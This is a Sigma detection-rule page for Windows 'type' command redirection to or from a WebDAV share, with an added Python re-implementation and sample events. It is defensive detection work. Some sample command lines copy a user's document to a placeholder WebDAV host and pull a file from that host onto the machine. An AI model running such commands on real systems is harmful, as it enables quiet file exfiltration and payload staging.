
Potential Download/Upload Activity Using Type Command

Sigma Rules

Summary
This detection rule flags suspicious use of the Windows 'type' command, which normally just prints a file's contents to the console. Because that output can be redirected, the command can also be used to move files to or from a WebDAV server. The rule defines two selections based on the structure of the command line: one for upload activity and one for download activity. Upload is characterised by 'type' reading a local file with a redirection operator (>) pointing to a WebDAV address. Download is the mirror image: 'type' reads from the WebDAV path and the redirection points to a file on the local file system. The rule triggers when either selection matches, enabling security teams to flag and investigate this use of the command in their environment.
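The two selections described above, as an added Python re-implementation run over constructed process-creation events (this is example code, not the rule's own source; the exact substrings it matches on, and the webdav.example host name, are assumptions, so check them against the published rule):

```python
from typing import Dict, List

# Added example, not the rule's own source: re-implements the two selections the
# summary describes. Exact substrings are an assumption about the rule's text.
UNC = "\\\\"  # two literal backslashes opening a UNC/WebDAV path, e.g. \\host\share

def is_upload(cmdline: str) -> bool:
    r"""type <local file> > \\host\share\file : local contents leave the host."""
    c = cmdline.lower()  # Sigma 'contains' matches case-insensitively by default
    return "type " in c and " > " + UNC in c

def is_download(cmdline: str) -> bool:
    r"""type \\host\share\file > <local file> : remote contents land on the host."""
    c = cmdline.lower()
    return "type " + UNC in c and " > " in c

def classify(cmdline: str) -> List[str]:
    """Selections that fire; the rule triggers when either selection matches."""
    hits = []
    if is_upload(cmdline):
        hits.append("selection_upload")
    if is_download(cmdline):
        hits.append("selection_download")
    return hits

def scan_events(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the process-creation events that trigger the rule, tagged with the selection."""
    alerts = []
    for ev in events:
        hits = classify(ev.get("CommandLine", ""))
        if hits:
            alerts.append({**ev, "matched": ",".join(hits)})
    return alerts

# Constructed sample process-creation events (not real telemetry); host name is a placeholder.
SAMPLE_EVENTS = [
    {"CommandLine": r"cmd.exe /c type C:\Users\bob\notes.docx > \\webdav.example\share\notes.docx"},
    {"CommandLine": r"cmd.exe /c type \\webdav.example\share\tool.txt > C:\Users\Public\tool.txt"},
    {"CommandLine": r"cmd.exe /c type C:\Windows\System32\drivers\etc\hosts"},
    {"CommandLine": r"cmd.exe /c type build.log > build_copy.log"},  # local redirect only
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert["matched"], "|", alert["CommandLine"])
```

Only the first two sample events fire; the plain file display and the local-to-local redirect do not, which is the distinction the rule relies on.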
Categories
  • Windows
  • On-Premise
  • Endpoint
Data Sources
  • Process
Created: 2022-12-14